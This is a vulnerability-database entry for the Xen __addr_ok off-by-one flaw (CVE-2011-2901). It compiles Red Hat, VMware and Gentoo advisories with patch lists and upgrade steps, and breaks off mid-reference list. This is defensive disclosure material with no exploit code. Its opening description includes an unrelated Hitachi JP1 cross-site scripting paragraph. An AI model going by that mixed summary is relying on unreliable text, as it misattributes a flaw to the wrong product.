VARIoT IoT vulnerabilities database
VAR-201310-0084 | CVE-2011-2901 | Xen of __addr_ok Service disruption in macro (DoS) Vulnerabilities |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
Off-by-one error in the __addr_ok macro in Xen 3.3 and earlier allows local 64 bit PV guest administrators to cause a denial of service (host crash) via unspecified hypercalls that ignore virtual-address bits. Xen is prone to a denial-of-service vulnerability due to an off-by-one error.
An attacker with access to a guest operating system can exploit this issue to crash the host operating system, effectively denying service to legitimate users. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed,. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following products are affected:
JP1/IT Resource Management - Manager
JP1/IT Service Level Management - Manager.
This update also fixes several bugs. Documentation for these bug fixes will
be available shortly from the Technical Notes document linked to in the
References section.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64
3. Description:
These packages contain the Linux kernel.
This update fixes the following security issues:
* A flaw in the Stream Control Transmission Protocol (SCTP) implementation
could allow a remote attacker to cause a denial of service by sending a
specially-crafted SCTP packet to a target system. (CVE-2011-2482,
Important)
If you do not run applications that use SCTP, you can prevent the sctp
module from being loaded by adding the following to the end of the
"/etc/modprobe.d/blacklist.conf" file:
blacklist sctp
This way, the sctp module cannot be loaded accidentally, which may occur
if an application that requires SCTP is started. A reboot is not necessary
for this change to take effect.
* A flaw in the client-side NFS Lock Manager (NLM) implementation could
allow a local, unprivileged user to cause a denial of service.
(CVE-2011-2491, Important)
* Flaws in the netlink-based wireless configuration interface could allow
a local user, who has the CAP_NET_ADMIN capability, to cause a denial of
service or escalate their privileges on systems that have an active
wireless interface. (CVE-2011-2517, Important)
* A flaw was found in the way the Linux kernel's Xen hypervisor
implementation emulated the SAHF instruction. When using a
fully-virtualized guest on a host that does not use hardware assisted
paging (HAP), such as those running CPUs that do not have support for (or
those that have it disabled) Intel Extended Page Tables (EPT) or AMD
Virtualization (AMD-V) Rapid Virtualization Indexing (RVI), a privileged
guest user could trigger this flaw to cause the hypervisor to crash.
(CVE-2011-2519, Moderate)
* A flaw in the __addr_ok() macro in the Linux kernel's Xen hypervisor
implementation when running on 64-bit systems could allow a privileged
guest user to crash the hypervisor. (CVE-2011-2901, Moderate)
* /proc/[PID]/io is world-readable by default. Previously, these files
could be read without any further restrictions. A local, unprivileged user
could read these files, belonging to other, possibly privileged processes
to gather confidential information, such as the length of a password used
in a process. (CVE-2011-2495, Low)
Red Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and
Vasiliy Kulikov of Openwall for reporting CVE-2011-2495.
This update also fixes the following bugs:
* On Broadcom PCI cards that use the tg3 driver, the operational state of a
network device, represented by the value in
"/sys/class/net/ethX/operstate", was not initialized by default.
Consequently, the state was reported as "unknown" when the tg3 network
device was actually in the "up" state. This update modifies the tg3 driver
to properly set the operstate value. (BZ#744699)
* A KVM (Kernel-based Virtual Machine) guest can get preempted by the host,
when a higher priority process needs to run. When a guest is not running
for several timer interrupts in a row, ticks could be lost, resulting in
the jiffies timer advancing slower than expected and timeouts taking longer
than expected. To correct for the issue of lost ticks,
do_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when
running as a KVM guest) to see if timer interrupts have been missed. If so,
jiffies is incremented by the number of missed timer interrupts, ensuring
that programs are woken up on time. (BZ#747874)
* When a block device object was allocated, the bd_super field was not
being explicitly initialized to NULL. Previously, users of the block device
object could set bd_super to NULL when the object was released by calling
the kill_block_super() function. Certain third-party file systems do not
always use this function, and bd_super could therefore become uninitialized
when the object was allocated again. This could cause a kernel panic in the
blkdev_releasepage() function, when the uninitialized bd_super field was
dereferenced. Now, bd_super is properly initialized in the bdget()
function, and the kernel panic no longer occurs. (BZ#751137)
4. Solution:
Users should upgrade to these updated packages, which contain
backported patches to resolve these issues. The system must be
rebooted for this update to take effect.
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
To install kernel packages manually, use "rpm -ivh [package]". Do not
use "rpm -Uvh" as that will remove the running kernel binaries from
your system. You may use "rpm -e" to remove old kernels after
determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):
709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing NFS share
714867 - CVE-2011-2482 kernel: sctp dos
716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak
718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations
718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation
728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()
6. Package List:
Red Hat Enterprise Linux EUS (v. 5.6 server):
Source:
kernel-2.6.18-238.31.1.el5.src.rpm
i386:
kernel-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm
kernel-devel-2.6.18-238.31.1.el5.i686.rpm
kernel-headers-2.6.18-238.31.1.el5.i386.rpm
kernel-xen-2.6.18-238.31.1.el5.i686.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm
ia64:
kernel-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm
kernel-devel-2.6.18-238.31.1.el5.ia64.rpm
kernel-headers-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm
noarch:
kernel-doc-2.6.18-238.31.1.el5.noarch.rpm
ppc:
kernel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm
kernel-devel-2.6.18-238.31.1.el5.ppc64.rpm
kernel-headers-2.6.18-238.31.1.el5.ppc.rpm
kernel-headers-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm
kernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm
s390x:
kernel-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm
kernel-devel-2.6.18-238.31.1.el5.s390x.rpm
kernel-headers-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm
kernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm
x86_64:
kernel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm
kernel-devel-2.6.18-238.31.1.el5.x86_64.rpm
kernel-headers-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm
kernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2482.html
https://www.redhat.com/security/data/cve/CVE-2011-2491.html
https://www.redhat.com/security/data/cve/CVE-2011-2495.html
https://www.redhat.com/security/data/cve/CVE-2011-2517.html
https://www.redhat.com/security/data/cve/CVE-2011-2519.html
https://www.redhat.com/security/data/cve/CVE-2011-2901.html
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2012-0001
Synopsis: VMware ESXi and ESX updates to third party library
and ESX Service Console
Issue date: 2012-01-30
Updated on: 2012-01-30 (initial advisory)
CVE numbers: --- COS Kernel ---
CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,
CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,
CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,
CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,
CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,
CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,
CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,
CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,
CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,
CVE-2011-2519, CVE-2011-2901
--- COS cURL ---
CVE-2011-2192
--- COS rpm ---
CVE-2010-2059, CVE-2011-3378
--- COS samba ---
CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522, CVE-2011-2694
--- COS python ---
CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,
CVE-2011-1521
--- python library ---
CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, CVE-2011-1521
----------------------------------------------------------------------
1. Summary
VMware ESXi and ESX updates to third party library and ESX Service
Console address several security issues.
2. Relevant releases
ESXi 4.1 without patch ESXi410-201201401-SG
ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG,
ESX410-201201406-SG, ESX410-201201407-SG
3. Problem Description
a. ESX third party update for Service Console kernel
The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,
CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,
CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201401-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
b. ESX third party update for Service Console cURL RPM
The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-2192 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201402-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
c. ESX third party update for Service Console nspr and nss RPMs
The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.
A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201404-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
d. ESX third party update for Service Console rpm RPMs
The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201406-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
e. ESX third party update for Service Console samba RPMs
The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522 and CVE-2011-2694 to these issues.
Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201407-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
f. ESX third party update for Service Console python package
The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and
CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201405-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
g. ESXi update to third party component python
The python third party library is updated to python 2.5.6 which
fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, and CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 5.0 ESXi patch pending
ESXi 4.1 ESXi ESXi410-201201401-SG
ESXi 4.0 ESXi patch pending
ESXi 3.5 ESXi patch pending
ESX 4.1 ESX not affected
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
VMware ESXi 4.1
---------------
ESXi410-201201401
http://downloads.vmware.com/go/selfsupport-download
md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F
http://kb.vmware.com/kb/2009143
ESXi410-201201401 contains ESXi410-201201401-SG
VMware ESX 4.1
--------------
ESX410-201201001
http://downloads.vmware.com/go/selfsupport-download
md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC
http://kb.vmware.com/kb/2009142
ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and
ESX410-201201407-SG
5. References
CVE numbers
--- COS Kernel ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901
--- COS cURL ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192
--- COS rpm ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378
--- COS samba ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694
--- COS python ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
--- python library ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521
----------------------------------------------------------------------
6. Change log
2012-01-30 VMSA-2012-0001
Initial security advisory in conjunction with the release of patches
for ESX 4.1 and ESXi 4.1 on 2012-01-30.
----------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2012 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8
wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8
f2pLxi537s+ew4dvnYNWlJ8=
=OAh4
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201309-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Xen: Multiple vulnerabilities
Date: September 27, 2013
Bugs: #385319, #386371, #420875, #431156, #454314, #464724,
#472214, #482860
ID: 201309-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Xen, allowing attackers on
a Xen Virtual Machine to execute arbitrary code, cause Denial of
Service, or gain access to data on the host.
Background
==========
Xen is a bare-metal hypervisor.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-emulation/xen < 4.2.2-r1 >= 4.2.2-r1
2 app-emulation/xen-tools < 4.2.2-r3 >= 4.2.2-r3
3 app-emulation/xen-pvgrub
< 4.2.2-r1 >= 4.2.2-r1
-------------------------------------------------------------------
3 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Xen. Please review the
CVE identifiers referenced below for details.
Impact
======
Guest domains could possibly gain privileges, execute arbitrary code,
or cause a Denial of Service on the host domain (Dom0). Additionally,
guest domains could gain information about other virtual machines
running on the same host or read arbitrary files on the host.
Workaround
==========
The CVEs listed below do not currently have fixes, but only apply to
Xen setups which have "tmem" specified on the hypervisor command line.
TMEM is not currently supported for use in production systems, and
administrators using tmem should disable it.
Relevant CVEs:
* CVE-2012-2497
* CVE-2012-6030
* CVE-2012-6031
* CVE-2012-6032
* CVE-2012-6033
* CVE-2012-6034
* CVE-2012-6035
* CVE-2012-6036
Resolution
==========
All Xen users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-emulation/xen-4.2.2-r1"
All Xen-tools users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.2.2-r3"
All Xen-pvgrub users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=app-emulation/xen-pvgrub-4.2.2-r1"
References
==========
[ 1 ] CVE-2011-2901
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2901
[ 2 ] CVE-2011-3262
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262
[ 3 ] CVE-2011-3262
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262
[ 4 ] CVE-2012-0217
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0217
[ 5 ] CVE-2012-0218
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0218
[ 6 ] CVE-2012-2934
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2934
[ 7 ] CVE-2012-3432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3432
[ 8 ] CVE-2012-3433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3433
[ 9 ] CVE-2012-3494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3494
[ 10 ] CVE-2012-3495
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3495
[ 11 ] CVE-2012-3496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3496
[ 12 ] CVE-2012-3497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3497
[ 13 ] CVE-2012-3498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3498
[ 14 ] CVE-2012-3515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3515
[ 15 ] CVE-2012-4411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4411
[ 16 ] CVE-2012-4535
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4535
[ 17 ] CVE-2012-4536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4536
[ 18 ] CVE-2012-4537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4537
[ 19 ] CVE-2012-4538
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4538
[ 20 ] CVE-2012-4539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4539
[ 21 ] CVE-2012-5510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5510
[ 22 ] CVE-2012-5511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5511
[ 23 ] CVE-2012-5512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5512
[ 24 ] CVE-2012-5513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5513
[ 25 ] CVE-2012-5514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5514
[ 26 ] CVE-2012-5515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5515
[ 27 ] CVE-2012-5525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5525
[ 28 ] CVE-2012-5634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5634
[ 29 ] CVE-2012-6030
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6030
[ 30 ] CVE-2012-6031
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6031
[ 31 ] CVE-2012-6032
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6032
[ 32 ] CVE-2012-6033
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6033
[ 33 ] CVE-2012-6034
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6034
[ 34 ] CVE-2012-6035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6035
[ 35 ] CVE-2012-6036
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6036
[ 36 ] CVE-2012-6075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6075
[ 37 ] CVE-2012-6333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6333
[ 38 ] CVE-2013-0151
